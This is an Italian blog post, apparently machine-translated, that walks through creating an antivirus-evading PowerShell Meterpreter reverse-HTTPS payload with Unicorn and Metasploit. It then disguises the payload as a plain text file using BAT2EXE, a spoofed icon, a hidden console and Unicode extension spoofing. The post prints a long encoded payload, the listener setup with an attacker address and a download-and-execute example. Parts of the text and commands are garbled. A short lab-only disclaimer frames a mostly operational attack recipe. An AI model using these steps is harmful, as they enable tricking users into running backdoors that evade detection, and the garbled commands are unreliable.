manabile ethical-hacker di sopravvivenza by Mammuth§hack
“you got from the community,
don’t forget to give back to the community"
Creazione di un payload irriconoscibile per bypassare un antivirus su win10
Ottieni link
Facebook
X
Pinterest
Email
Altre app
-
Stasera ci divertiamo un poco, ricordo a quei due gatti che mi seguono di non fare casino e fare tutto a casa con vm e ferri vostri, se vi beccano fate la figura dei pirla e vi beccano; questi sono piccoli laboratori che facciamo in mentalità ethical; per quanto mi riguarda se devi difenderti e difendere aziende che capiscono e ti fanno lavorare preferisco conoscere anche gli attacchi più banali; mi è capitato poco tempo fa che un cliente avesse preso un ransomware e di beccare il ragazzino che lo aveva comprato già compilato e iniettato chiedendo poi riscatto all'azienda; ho fatto risparmiare l'azienda e ho fatto capire al ragazzino che questo gioco può diventare pericoloso, se entri in una banca con una pistola giocattolo, non ucciderai nessuno ma rischi che facciano fuori te; insomma detto ciò vediamo di usare un pò anche l'amato unicorn con metasploit e fare qualcosa di semplice:
Gli hacker sono sempre alla ricerca di exploit zero-day in grado di superare con successo le funzionalità di sicurezza di Windows 10. Sono state condotte ricerche approfondite per creare malware non rilevabili e interi progetti GitHub per automatizzare la creazione di payload irriconoscibili come WinPaylods, Veil v3 e TheFatRat. Usando un pò di ingegneria sociale per convincere un utente di destinazione ad aprire un file malevolo si può semplicemente mettere un po' di Unicode nel nome del file. Ad esempio, la seguente GIF mostra un file eseguibile di Windows (EXE) mascherato da un file di testo normale (TXT), anche se in Spiegazione Esplora file non è disponibile l'opzione Nascondi tipi di file conosciuti esistenti, Vedi al punto 5) la spiegazione del procedimento.
Non commettere errori, il file sulla destra è un eseguibile e, cosa più importante, è fatto da Windows Sistema operativo riconosciuto come un file eseguibile. Quando si fa clic sul file di testo sbagliato, si apre un nuovo documento con Blocco note, l'editor di testo predefinito in Windows 10. Dopo aver aperto Blocco note, esegue automaticamente un payload di PowerShell incorporato (con unicorn), che è una backdoor per compromettere l'orario del Computer Windows.
Unicorn, sviluppato da TrustedSec, è un semplice strumento progettato per supportare i test di penetrazione con attacchi di downgrade di PowerShell e per immettere direttamente in memoria il carico utile del codice shell sofisticato. Le tecniche utilizzate da Unicorn sono basate sul lavoro di Matthew Graeber e del fondatore di TrustedSec David Kennedy .
1: Installare Metasploit Framework
Metasploit è una dipendenza di Unicorn. Prima di installare Unicorn, guido rapidamente i lettori attraverso un'installazione di metasploit per assicurarmi che sia aggiornato con il repository GitHub.
Kali fa un ottimo lavoro nel mantenere versioni stabili di Metasploit, ma ti mostrerò come installare l'ultima versione assoluta. Innanzitutto, rimuovi le versioni precedenti di Metasploit che potrebbero essere preinstallate in Kali.
apt-get remove metasploit-framework
Quindi utilizzare cURL per scaricare il programma di installazione Metasploit.
Aggiorna i permessi del file msfinstall appena creati per assicurarti che siano in Esecuzione di Kali
chmod 755 msfinstall
Quindi eseguire lo script di installazione con ./ msfinstall .
./ msfinstall off
Aggiungi il framework metasploit all'elenco dei repository..OK
Aggiorna la cache del pacchetto..OK
Cerca aggiornamenti e installa ..
Leggi gli elenchi dei pacchetti ... Fatto
Crea una struttura di dipendenza
Leggi le informazioni sullo stato ... Fatto
Verranno installati i seguenti NUOVI pacchetti:
Metasploit Framework
0 aggiornato, 1 reinstallato, 0 rimosso e 124 non aggiornato.
Sono necessari 161 MB di archivi.
Dopo questo processo, verranno utilizzati 377 MB di memoria aggiuntiva.
Ottieni: 1 http://downloads.metasploit.com/data/releases/metasploit-framework/apt lucid / main amd64 metasploit-framework amd64 4.16.57 + 20180529103642.git.4.6219ce0 ~ 1rapid7-1 [161 MB]
Ottieni: 1 http://downloads.metasploit.com/data/releases/metasploit-framework/apt lucid / main amd64 metasploit-framework amd64 4.16.57 + 20180529103642.git.4.6219ce0 ~ 1rapid7-1 [161 MB]
Raggiunto 65,7 MB in 11 minuti 39 secondi (93,9 kB / s)
Seleziona il pacchetto metasploit-framework precedentemente non selezionato.
(Lettura del database ... 145965 I file e le directory sono attualmente installati.)
Preparazione per il disimballaggio ... / metasploit-framework_4.16.57 + 20180529103642.git.4.6219ce0 ~ 1rapid7-1_amd64.deb ...
Disimballare Metasploit Framework (4.16.57 + 20180529103642.git.4.6219ce0 ~ 1rapid7-1) ...
Configurare Metasploit Framework (4.16.57 + 20180529103642.git.4.6219ce0 ~ 1rapid7-1) ...
alternative di aggiornamento: utilizzare / opt / metasploit-framework / bin / msfbinscan per fornire / usr / bin / msfbinscan (msfbinscan) in modalità automatica
alternative di aggiornamento: utilizzare / opt / metasploit-framework / bin / msfconsole per montare / usr / bin / msfconsole (msfconsole) in modalità automatica
aggiornamento-alternative: utilizzare / opt / metasploit-framework / bin / msfd per fornire / usr / bin / msfd (msfd) in modalità automatica
Alternative di aggiornamento: utilizzare / opt / metasploit-framework / bin / msfdb per montare / usr / bin / msfdb (msfdb) in modalità automatica
alternative di aggiornamento: utilizzare / opt / metasploit-framework / bin / msfelsfscan per fornire / usr / bin / msfelscan (msfelscan) in modalità automatica
aggiornamento-alternative: utilizzare / opt / metasploit-framework / bin / msfmachscan per fornire / usr / bin / msfmachscan (msfmachscan) in modalità automatica
alternative di aggiornamento: utilizzare / opt / metasploit-framework / bin / msfpescan per fornire / usr / bin / msfpescan (msfpescan) in modalità automatica
Alternative di aggiornamento: utilizzare / opt / metasploit-framework / bin / msfrop per montare / usr / bin / msfrop (msfrop) in modalità automatica
alternative di aggiornamento: utilizzare / opt / metasploit-framework / bin / msfrpc per montare / usr / bin / msfrpc (msfrpc) in modalità automatica
aggiornamento-alternative: utilizzare / opt / metasploit-framework / bin / msfrpcd per fornire / usr / bin / msfrpcd (msfpcd) in modalità automatica
alternative di aggiornamento: utilizzare / opt / metasploit-framework / bin / msfupdate per fornire / usr / bin / msfupdate (msfupdate) in modalità automatica
aggiornamento-alternative: utilizzare / opt / metasploit-framework / bin / msfvenom per fornire / usr / bin / msfvenom (msfvenom) in modalità automatica
alternative di aggiornamento: utilizzare / opt / metasploit-framework / bin / metasploit-aggregator per fornire / usr / bin / metasploit-aggregator in modalità automatica
Esegui msfconsole per iniziare
W: --force-yes è deprecato, usa invece una delle opzioni che iniziano con --allow.
Al termine dell'installazione, la directory / opt contiene una nuova directory metasploit-framework /.
Utilizzare il seguente comando per creare un payload con Unicorn:
./ Unicorn. py windows / meterpreter / reverse_https
Unicorn usa il modulo Metasploit reverse_https per connettersi all'indirizzo IP dell'aggressore tramite la porta specificata.
[*] Genera il codice shell del payload. Questo potrebbe richiedere alcuni secondi / minuti mentre creiamo lo shellcode ...
, /
//
, //
___ / | | //
`__ / _ - (/ | ___ / - /
| _- ___ __-_ `- / - / .
| _-___, - _____-- / _) & # 39;
-_ / __ (`(__` |
` __ | | ) / (/ |
, ._____., & # 39; - // - | | "/
/ __. , / /, --- | /
/ / _. & # 39; / `_ / _, & # 39; | |
| | (( |, / & # 39; __ / & # 39; / | | |
| `-,` _ / _ ------ ______ / () /
| | _. , ___ /
| | _
_ /
._ __ _ | |
___ |
__ __ _ | |
| _____ ____ | |
| __ --- & # 39; .__ | | |
__ --- /) | /
____ / / () ( & # 39; ---_ / | |
__________ / (, --__ _________. | ./ |
| & # 39; ---_ -, _ ,. / |
| _ ` /` ---_______- \ /
.___, `| /
| _ | (|: |
| / / | | ;
(`_ & # 39; |
. . & # 39; __ / | |
. | |
()
| | | |
| \ Me`
(__; (_; (& # 39; -_ & # 39 ;;
| ___ ___: ___:
aHR0cHM6Ly93d3cuYmlYXJ5ZGVmZW5zZS5jb20vd3AtY29udGVudC91cGxvYWRzLzIwMTcvMDUvS2VlcE1hdHRIYXBweS5qcGc =
Scritto da: Dave Kennedy presso TrustedSec (https://www.trustedsec.com)
Twitter: @ TrustedSec, @HackingDave
Happy unicorn magic.
[********************************************************************************************************]
----- ISTRUZIONI DI ATTACCO POWERSHELL ----
Tutto è ora creato in due file, powershell_attack.txt e unicorn.rc. Il file di testo contiene tutto il codice necessario per iniettare in memoria l'attacco di PowerShell. Si noti che è necessaria una posizione che supporti in qualche modo le iniezioni di comandi remoti. Spesso ciò potrebbe essere dovuto a un documento Excel / Word o tramite psexec_commands in Metasploit, SQLi, ecc. Ci sono così tante implicazioni e scenari in cui è possibile utilizzare questo attacco. Basta inserire il comando powershell_attack.txt in qualsiasi finestra del prompt dei comandi, oppure è possibile richiamare il file eseguibile di PowerShell e recuperare la shell. Questo attacco supporta anche Windows / download_exec per un metodo di payload invece dei payload meterpreter.Se si sta utilizzando il download e l'exec, è sufficiente inserire python unicorn.py windows / download_exec url = https: //www.thisisnotarealsite.com/payload.exe e il codice PowerShellscaricherà ed eseguirà il payload.
Nota che devi abilitare un ascoltatore per rilevare l'attacco.
[*******************************************************************************************************]
[*] Codice di output di PowerShell esportato in powershell_attack.txt.
[*] Esportato il file Metasploit RC come unicorn.rc. Eseguire msfconsole -r unicorn.rc per eseguire e creare listener.
Quando Unicorn ha generato il payload, vengono creati due nuovi file. Il primo è powershell_attack.txt che può essere visualizzato con il comando catpowershell_attack.txt . Questo visualizza il codice PowerShell che viene eseguito sul computer di destinazione di Windows 10 e si connette al misuratore.
cat powershell_attack.txt
powershell / w 1 / C "s # 39; v Mx -; s # 39; v CV e # 39; s # 39; (g & # 39; v Mx) .value.toString() + (g & # 39; v CV) .value.toString ()); powershell (g & # 39; v nU) .value.toString ()(& # 39; JAB GEAdABpAG AGMAMAAsADAAeAA2ADQALAAwAHgAOABiACwAMAB4ADUAMAAsADAAeAAzADAALAAwAHgAOABiACwAMAB4ADUAMgAsADAAeAAwAGMALAAwAHgAOABiACwAMAB4ADUAMgAsADAAeAAxADQALAAwAHgAOABiACwAMAB4ADcAMgAsADAAeAAyADgALAAwAHgAMABmACwAMAB4AGIANwAsADAAeAA0AGEALAAwA HgAMgA2ACwAMAB4ADMAMQAsADAAeABmAGYALAAwAHgAYQBjACwAMAB4ADMAYwAsADAAeAA2ADEALAAwAHgANwBjACwAMAB4ADAAMgAsADAAeAAyAGMALAAwAHgAMgAwACwAMAB4AGMAMQAsADAAeABjAGYALAAwAHgAMABkACwAMAB4ADAAMQAsADAAeABjADcALAAwAHgAZQAyACwAMAB4AGYAMgAsADAAeAA1ADIALAAwAHgANQA3ACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMQAwACwAMAB4ADgAYgAsADAAeAA0AGEALAAwAHgAMwBjACwAMAB4ADgAYgAsADAAeAA0AGMALAAwAHgAMQAxACwAMAB4ADcAOAAsADAAeABlADMALAAwAHgANAA4ACwAMAB4ADAAMQAsADAAeABkADEALAAwAHgANQAxACwAMAB4ADgAYgAsADAAeAA1ADkALAAwAHgAMgAwACwAMAB4ADAAMQAsADAAeABkADMALAAwAHgAOABiACwAMAB4ADQAOQAsADAAeAAxADgALAAwAHgAZQAzACwAMAB4ADMAYQAsADAAeAA0ADkALAAwAHgAOABiACwAMAB4ADMANAAsADAAeAA4AGIALAAwAHgAMAAxACwAMAB4AGQANgAsADAAeAAzADEALAAwAHgAZgBmACwAMAB4AGEAYwAsADAAeABjADEALAAwAHgAYwBmACwAMAB4ADAAZAAsADAAeAAwADEALAAwAHgAYwA3ACwAMAB 4ADMAOAAsADAAeABlADAALAAwAHgANwA1ACwAMAB4AGYANgAsADAAeAAwADMALAAwAHgANwBkACwAMAB4AGYAOAAsADAAeAAzAGIALAAwAHgANwBkACwAMAB4ADIANAAsADAAeAA3ADUALAAwAHgAZQA0ACwAMAB4ADUAOAAsADAAeAA4AGIALAAwAHgANQA4ACwAMAB4ADIANAAsADAAeAAwADEALAAwA HgAZAAzACwAMAB4ADYANgAsADAAeAA4AGIALAAwAHgAMABjACwAMAB4ADQAYgAsADAAeAA4AGIALAAwAHgANQA4ACwAMAB4ADEAYwAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADgAYgAsADAAeAAwADQALAAwAHgAOABiACwAMAB4ADAAMQAsADAAeABkADAALAAwAHgAOAA5ACwAMAB4ADQANAAsADAAeAAyADQALAAwAHgAMgA0ACwAMAB4ADUAYgAsADAAeAA1AGIALAAwAHgANgAxACwAMAB4ADUAOQAsADAAeAA1AGEALAAwAHgANQAxACwAMAB4AGYAZgAsADAAeABlADAALAAwAHgANQBmACwAMAB4ADUAZgAsADAAeAA1AGEALAAwAHgAOABiACwAMAB4ADEAMgAsADAAeABlAGIALAAwAHgAOABkACwAMAB4ADUAZAAsADAAeAA2ADgALAAwAHgANgBlACwAMAB4ADYANQAsADAAeAA3ADQALAAwAHgAMAAwACwAMAB4ADYAOAAsADAAeAA3ADcALAAwAHgANgA5ACwAMAB4ADYAZQAsADAAeAA2ADkALAAwAHgANQA0ACwAMAB4ADYAOAAsADAAeAA0AGMALAAwAHgANwA3ACwAMAB4ADIANgAsADAAeAAwADcALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAAzADEALAAwAHgAZABiACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMA B4ADUAMwAsADAAeAA1ADMALAAwAHgANgA4ACwAMAB4ADMAYQAsADAAeAA1ADYALAAwAHgANwA5ACwAMAB4AGEANwAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANgBhACwAMAB4ADAAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADYAOAAsADAAeABiAGIALAAwA HgAMAAxACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAZQA4ACwAMAB4AGIAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAAyAGYALAAwAHgAMwA2ACwAMAB4ADMANAAsADAAeAA1ADIALAAwAHgANgAxACwAMAB4ADcAMgAsADAAeAAzADQALAAwAHgANQA3ACwAMAB4ADQAMgAsADAAeAA3ADkALAAwAHgANQAwACwAMAB4ADcANAAsADAAeAA3ADYALAAwAHgAMwAwACwAMAB4ADUANwAsADAAeAAzADcALAAwAHgANQAxACwAMAB4ADQAZQAsADAAeAA0AGUALAAwAHgAMwA0ACwAMAB4ADUANQAsADAAeAA0ADYALAAwAHgANQAxACwAMAB4ADMAMgAsADAAeAA1ADUALAAwAHgANQAxACwAMAB4ADcAMQAsADAAeAA3ADIALAAwAHgANwA5ACwAMAB4ADQAZQAsADAAeAAwADAALAAwAHgANQAwACwAMAB4ADYAOAAsADAAeAA1ADcALAAwAHgAOAA5ACwAMAB4ADkAZgAsADAAeABjADYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADkALAAwAHgAYwA2ACwAMAB4ADUAMwAsADAAeAA2ADgALAAwAHgAMAAwACwAMAB4ADMA & # 39; + # 39; MgAsADAAeABlADAALAAwAHgAOAA0ACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUANwAsADAAeAA1ADMALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeABlAGIALAAwAHgANQA1ACwAMAB4ADIAZQAsADAAeAAzAGIALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA5ADYALAAwAHgANgBhACwAMAB4ADAAYQAsADAAeAA1AGYALAAwAHgANgA4ACwAMAB4ADgAMAAsADAAeAAzADMALA AwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA4ADkALAAwAHgAZQAwACwAMAB4ADYAYQAsADAAeAAwADQALAAwAHgANQAwACwAMAB4ADYAYQAsADAAeAAxAGYALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeAA3ADUALAAwAHgANAA2ACwAMAB4ADkAZQAsADAAeAA4ADYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeAAyAGQALAAwAHgAMAA2ACwAMAB4ADEAOAAsADAAeAA3AGIALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcANQAsADAAeAAxADYALAAwAHgANgA4ACwAMAB4ADgAOAAsADAAeAAxADMALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA2ADgALAAwAHgANAA0ACwAMAB4AGYAMAAsADAAeAAzADUALAAwAHgAZQAwACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgANABmACwAMAB4ADcANQAsADAAeABjAGQALAAwAHgANgA4ACwAMAB4AGYAMAAsADAAeABiADUALAAwAHgAYQAyACwAMAB4ADU ANgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADYAYQAsADAAeAA0ADAALAAwAHgANgA4ACwAMAB4ADAAMAAsADAAeAAxADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA2ADgALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA0ADAALAAwAHgAMAAwACwAMAB4ADUAMwAsADAAeAA2ADgALAAwAHgANQA4ACwAMAB4AGEANAAsADAAeAA1ADMALAAwAHgAZQA1ACwAMAB4AGYAZgAsADAAeABkADUALA AwAHgAOQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgAOAA5ACwAMAB4AGUANwAsADAAeAA1ADcALAAwAHgANgA4ACwAMAB4ADAAMAAsADAAeAAyADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA1ADMALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeAAxADIALAAwAHgAOQA2ACwAMAB4ADgAOQAsADAAeABlADIALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcANAAsADAAeABjAGQALAAwAHgAOABiACwAMAB4ADAANwAsADAAeAAwADEALAAwAHgAYwAzACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA1ACwAMAB4AGUANQAsADAAeAA1ADgALAAwAHgAYwAzACwAMAB4ADUAZgAsADAAeABlADgALAAwAHgANgA5ACwAMAB4AGYAZgAsADAAeABmAGYALAAwAHgAZgBmACwAMAB4ADMAMQAsADAAeAAzADkALAAwAHgAMwAyACwAMAB4ADIAZQAsADAAeAAzADEALAAwAHgAMwA2ACwAMAB4ADMAOAAsADAAeAAyAGUALAAwAHgAMwAxACwAMAB4ADIAZQAsADAAeAAzADUALAAwAHgAMAAwADsAJABxAF YAIAA9ACAAMAB4ADEAMAAwADcAOwBpAGYAIAAoACQAdABUAC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAA3ACkAewAkAHEAVgAgAD0AIAAkAHQAVAAuAEwAZQBuAGcAdABoAH0AOwAkAHEAZQA9ACQAWABkADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAANwAsACQAcQBWACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAWABEAD0AMAA7ACQAWABEACAALQ BsAGUAIAAoACQAdABUAC4ATABlAG4AZwB0AGgALQAxACkAOwAkAFgARAArACsAKQAgAHsAJABYAGQAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABxAGUALgBUAG8ASQBuAHQAMwAyACgAKQArACQAWABEACkALAAgACQAdABUAFsAJABYAEQAXQAsACAAMQApAH0AOwAkAFgAZAA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAcQBlACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwApAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABFAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAdABUAFYAKQApADsAJABCAHYAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgA è) [19659010] L'altro file che è stato creato da Unicorn, unicorn.rc è un file di risorse che contiene l'installazione e la configurazione di msfconsole automatizzare [19659006;DgAKQB7ACQAcABMACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAHAATAAgACQAQgB2ACAAJABFAGQAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAQgB2ACAAAgAgAAgA7AH0A'] Passaggio 4: Avviare Msfconsole con il file di risorse
Per avviare Metasploit, eseguire il comando msfconsole -r /opt/unicorn/unicorn.rc
msfconsole -r / opt / unicorn / unicorn.rc
= [ metasploit v4.16.59-dev- ]
+ - - = [ 1769 exploits - 1008 auxiliary - 307 post ]
+ - - = [ 537 payloads - 41 encoders - 10 nops ]
+ - - = [ Free Metasploit Pro trial: http://r-7.co/trymsp ]
[*] Elaborazione /opt/unicorn/unicorn.rc per la politica ERB.
Risorsa (/opt/unicorn/unicorn.rc)> Usa Multi / Handler
Risorsa (/opt/unicorn/unicorn.rc)> Imposta finestra payload / meterpreter / reverse_https
Payload => Windows / Meterpreter / Reverse_https
Risorsa (/opt/unicorn/unicorn.rc)> imposta LHOST 192.168.1.5
LHOST => 192.168.1.5
Risorsa (/opt/unicorn/unicorn.rc)> Imposta LPORT 443
LPORT => 443
Risorsa (/opt/unicorn/unicorn.rc)> imposta ExitOnSession false
ExitOnSession => false
resource (/opt/unicorn/unicorn.rc)> Imposta EnableStageEncoding su true
EnableStageEncoding => true
Risorsa (/opt/unicorn/unicorn.rc)> Exploit -j
[*] Exploit è in esecuzione come processo in background 0.
[-] Il gestore non è stato in grado di eseguire il binding a 192.168.1.5:443
msf exploit (multi / handler)> [*] Avviato handler HTTPS su https://0.0.0.0:443
Il file di risorse attiva automaticamente il gestore ( multi / handler ), impostare il tipo di
utilità ( windows / meterpreter / reverse_https ), impostare l'indirizzo IP dell'utente
malintenzionato ( LHOST ), impostare il numero di porta ( LPORT ), attivare il Codifica Stager
( EnableStageEncoding ), e avvia il listener msfconsole ( exploit -j ) - facile.
A questo punto tutto è impostato sul lato dell'attaccante e pronto per le connessioni in entrata.
Ora tutto ciò che conta è verificare che il payload funzioni e aggiri efficacemente Windows Defender
Molti progetti mettono in guardia i tester di penetrazione dai pericoli dell'utilizzo di scanner antivirus online come VirusTotal. Nel caso di TheFatRat, lo sviluppatore avverte espressamente contro l'utilizzo di VirusTotal ogni volta che viene avviato il programma.
Come qualcuno che ha regolarmente sperimentato molti software di bypass antivirus, capisco la tentazione di sapere se il carico utile creato sta rilevando bypasserà le più diffuse tecnologie antivirus. Tuttavia, il caricamento su scanner di virus online è estremamente dannoso per questi progetti. VirusTotal suddivide i payload con i fornitori di terze parti, aumentando drasticamente i tassi di riconoscimento generali in breve tempo.
In alternativa agli scanner online, incoraggio Pentester a simulare l'ambiente del sistema operativo della loro destinazione con macchine virtuali. Ad esempio, se rileva che una destinazione sulla rete locale utilizza Windows 10 con AVG o Avast, crea una macchina virtuale Windows 10, installa il software antivirus più recente nella VM e verifica il carico utile nella VM. Ciò fornisce al pen-tester la certezza che un payload funzioni correttamente e impedisce a Virus Total di analizzare il file dannoso e di condividere i risultati con altre società.
Ecco per installare Metasploit, creare il payload di PowerShell con Unicorn e automatizzare il processo di avvio di msfconsole Unicorn è un ottimo strumento che ti consente di creare payload avanzati di PowerShell difficile da bypassare il software antivirus comune. Nel mio articolo di follow-up, mostro come trasformare il codice di PowerShell in un file eseguibile e fare alcuni trucchi per far apparire l'eseguibile come un semplice file di testo.
Una volta che un hacker ha creato un payload PowerShell per eludere il software antivirus e impostato msfconsole sul proprio sistema di attacco, può quindi passare a camuffare il proprio eseguibile per farlo apparire come un normale file di testo. Questo è il modo in cui gli utenti di Windows 10 apriranno effettivamente il payload senza sapere che lo stanno facendo. Il payload PowerShell generato da Unicorn funziona come previsto se usato sul computer Windows 10 di destinazione. Crea una connessione HTTPS inversa per tornare alla configurazione di Kali dell'attaccante mentre elude attivamente i rilevamenti di Windows Defender e Avast antivirus . È tutto fantastico, ma la vera sfida è indurre l'utente di Windows di destinazione a eseguire il codice sul proprio computer.
A tale scopo, è possibile eseguire alcune operazioni sul payload di PowerShell prima di inviarlo alla vittima. Il payload deve essere convertito in un eseguibile di Windows (EXE). Anche l'icona (file ICO) dovrà essere modificata per apparire come un normale file di testo. La più grande bandiera rossa che il file di testo falso è in realtà un eseguibile è l'estensione del file. Alcuni utenti Windows disabilitano l' opzione " Nascondi le estensioni per i tipi di file conosciuti " per proteggersi dagli attacchi di spoofing delle estensioni dei file. In questo articolo, mostrerò come falsificare le estensioni di file, anche con estensioni di file non nascoste.
Per i lettori che potrebbero aver saltato la prima parte di questo articolo , ecco di nuovo la GIF che mostra di nuovo i file di testo reali e falsi fianco a fianco:Il file a sinistra è un vero file di testo. Il file a destra è il payload di PowerShell, progettato per aprire il Blocco note prima di eseguire il payload di PowerShell.Passo 1Salva il carico utile di PowerShell I passaggi seguenti richiedono un sistema operativo Windows. Consiglio di utilizzare una macchina virtuale (VM) Windows 10 in VirtualBox, WmVare Fusion o Parallels. Io uso Kali su Parallels in MacOS. Ma questo exploit l'ho fatto da console Unix e funziona. Su Amazon: Guida di VirtualBox per principianti Prima di andare oltre, il payload di PowerShell creato in precedenza deve essere spostato nel sistema Windows e salvato come payload.bat utilizzando Blocco note o un editor di testo preferito. Il payload.bat verrà manipolato per apparire come un normale file di testo nei passaggi successivi.Passo 2Scarica le icone di Windows 10 Le icone di Windows 10 dovranno essere scaricate per iniziare a trasformare il payload.bat in un falso file di testo. Queste icone verranno utilizzate per falsificare l'icona del file. Puoi scaricare le icone di Windows 10 utilizzando git clone "https://github.com/B00merang-Project/Windows-10-Icons" . ~$ git clone 'https://github.com/B00merang-Project/Windows-10-Icons' Cloning into 'Windows-10-Icons'... remote: Counting objects: 3495, done. remote: Total 3495 (delta 0), reused 0 (delta 0), pack-reused 3495 Receiving objects: 100% (3495/3495), 14.69 MiB | 294.00 KiB/s, done. Resolving deltas: 100% (393/393), done. Checking connectivity... done. Questo repository potrebbe non contenere repliche esatte delle icone di Windows 10 integrate ma apparire abbastanza vicino e funzionerà bene per gli scopi di questo articolo. Se i lettori sono in grado di progettare icone o localizzare icone migliori online, incoraggio l'uso di quelle. Sto usando text-x-generic.png che si trova nella directory Windows-10-Icons / 256x256 / mimetypes /, ma qualsiasi PNG funzionerà per continuare a seguirlo.Passaggio 3Converti il PNG in formato ICO Il PNG dovrà essere convertito nel formato icona ICO di Windows. Questo può essere fatto utilizzando strumenti online come ConvertICO . Carica semplicemente il PNG desiderato sul sito web e lo riprodurrà in formato ICO. Salva il nuovo ICO con il nome file fakeTextFile.ico .
Passaggio 4Installa BAT2EXE Ho già descritto BAT2EXE (B2E) in un articolo . Questo è un ottimo strumento per convertire i file BAT in eseguibili di Windows. Per scaricare B2E, il sito Web richiede agli utenti di minare la criptovaluta per diversi minuti in cambio del download del loro software gratuito . Se i lettori desiderano supportare lo sviluppatore B2E, passare alla pagina di download e prendere il software B2E più recente. Altrimenti, i lettori possono usare il mio mirror di una versione leggermente più vecchia di B2E . Utilizzando il mio mirror GitHub, in Windows, visita l'URL seguente per scaricare B2E. https://github.com/tokyoneon/B2E/raw/master/Bat_To_Exe_Converter.zip Decomprimere il download ed eseguire il file "Bat_To_Exe_Converter_ (Installer) .exe" per installarlo.Passaggio 5Importa il Payload BAT Al termine, avvia B2E e fai clic sul pulsante "Apri" per importare il payload.bat creato in precedenza.Passaggio 6Trojanizza il carico utile Quindi, aggiungi la parola "blocco note" all'inizio del payload.bat e fai clic su "Salva". In questo modo l'eseguibile aprirà il Blocco note sul computer Windows prima di eseguire il payload di PowerShell. In questo modo l'utente di destinazione crederà che il file su cui ha appena fatto clic sia effettivamente un file di testo legittimo.Ora, c'è molto che si può fare per convincere ulteriormente qualcuno che il file è legittimo. Ad esempio, se Blocco note non è il loro editor di testo predefinito, potrebbe sembrare sospetto che questo file apra Blocco note quando altri file di testo aprono Notepad ++ , un popolare editor di testo di terze parti. Quindi migliorare il BAT per aprire un programma predefinito, invece di Blocco note, potrebbe essere desiderabile. Inoltre, l'apertura di un Blocco note vuoto quando il file viene segnalato come di dimensioni 12 KB potrebbe anche essere sospetto, quindi trovare un modo per produrre testo o Trojanizzare l'EXE per scaricare prima un file di testo effettivo potrebbe aiutare a migliorare l'efficacia di tali attacchi. Per semplicità, continuerò così com'è, con il BAT che apre un blocco note vuoto. Si spera che questo dimostrerà quanto sia facile creare trojan e portare i lettori sulla strada giusta per sviluppare questo attacco per soddisfare le loro esigenze individuali.Passaggio 7Converti ed esporta il carico utile Fatto ciò, seleziona l'opzione "Icona" per abilitarlo e importa l'icona fakeTextFile.ico creata nel passaggio precedente utilizzando il pulsante "...". Quindi, modifica il formato Exe in "Windows a 64 bit | (invisibile)" per evitare che i terminali vengano visualizzati quando l'utente di destinazione apre il file.Fare clic sul pulsante "Converti" per creare l'EXE e salvare il nome del file come fake.exe .Dopo aver salvato fake.exe sul desktop e posizionato accanto a un vero file di testo, i lettori potrebbero notare una sottile linea rossa nell'icona fake che non esiste nell'icona del vero file di testo. Questo può essere facilmente risolto utilizzando un set di icone di Windows 10 migliore o utilizzando un diverso tipo di file per lo spoofing.Passaggio 8Spoof l'estensione del file con Unicode Il problema più grande è l'estensione del file. Grazie all'opzione "Nascondi le estensioni per i tipi di file conosciuti" nelle opzioni di Esplora file, le estensioni dei file non vengono 